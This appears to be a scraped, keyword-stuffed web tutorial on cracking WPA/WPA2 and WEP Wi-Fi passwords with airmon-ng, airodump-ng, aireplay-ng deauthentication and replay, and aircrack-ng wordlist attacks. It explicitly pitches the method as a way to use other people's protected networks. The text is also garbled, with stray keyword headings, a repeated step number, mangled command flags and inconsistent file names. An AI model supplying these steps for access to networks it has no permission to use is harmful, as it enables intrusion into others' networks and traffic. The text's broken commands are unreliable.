Backtrack Wifi Hack Downloadwesternbowl

Cracking a WPA or WPA2 wireless network is more difficult than cracking a WEP protected network because it depends on the complexity of the wireless password and on the attack method (Dictionary Attack or Brute Force Attack). Here you will learn step by step instructions how to crack WPA2 wifi password which uses a pre-shared keys (PSK) of a wireless network. This also applies to WPA secured network.

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  2. Backtrack 3 Wifi Hack
  3. Backtrack Wifi

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Here are the basics steps we will be going through:

Step 1 :-airmon-ng

Step 2 :-airmon-ng wlan0

Step 3 :-airmon-ng start wlan0

Step 4 :-airodump-ng mon0

Backtrack Wifi Hack Free Download

Wait for some time for all the networks to load then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack which has “WPA” or “WPA2″ encryption in the “ENC” column, and “PSK” in the “AUTH” column. “OPN” means that the network is open and you can connect to it without a key, WEP will not work here. After selecting the network that you want to crack take note of the BSSID, and the channel (CH) values.

Step 5 :-airodump-ng –c 6 –bssid 1C:7E:E5:32:1D:54 –w crack1 mon0

Step 6 :-aireplay-ng -0 0 –a 1c:7E:E5:32:1D:54 -c 00:21:5C:50:DE:2D mon0

Step 6 :- aircrack-ng –w /pentest/wireless/aircrack-ng/test/password.list crack1.cap

In present world, we all are dealing with modern technology, Wifi is also one of them. Wifi connections are available everywhere i.e school, college, Office even at our home also. But at a same time we all are facing with one of the problem i.e every Wifi is password protected, and we are unable to use all wifi. We can use only those wifi whose connection is open or whose password we know it. So don’t worry my friends I will show you how to crack wifi password using Backtrack 5.

First of all I want to say what is WEP Cracking…

WEP Cracking

WEP stands for Wireless Equivalent Privacy.

In WEP Cracking first all the hacker needs to capture sample packets not intended for his own network interface and then run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. After that the hacker found the key the he decrypted the key using decrypted tools.

Now follows these steps to crack the WEP Wifi key…

Step 1 :-Turn on Monitor mode


airmon-ng start wlan0

Step 2 :-# airodump-ng mon0

Step 3 :-# airodump-ng -w twan –c 11 –bssid C8:3A:35:2F:E7:30 mon0

Step 4 :-aireplay-ng -1 0 –a C8:3A:35:2F:E7:30 mon0

Step 5 :-aireplay-ng -3 –b C8:3A:35:2F:E7:30 mon0


Backtrack 3 Wifi Hack

As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in twan=02.cap file.

NOTE: do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key.

Backtrack Wifi

Step 6 :-aircrack-ng twan-02.cap

Step 7 :-Finally we found the Key…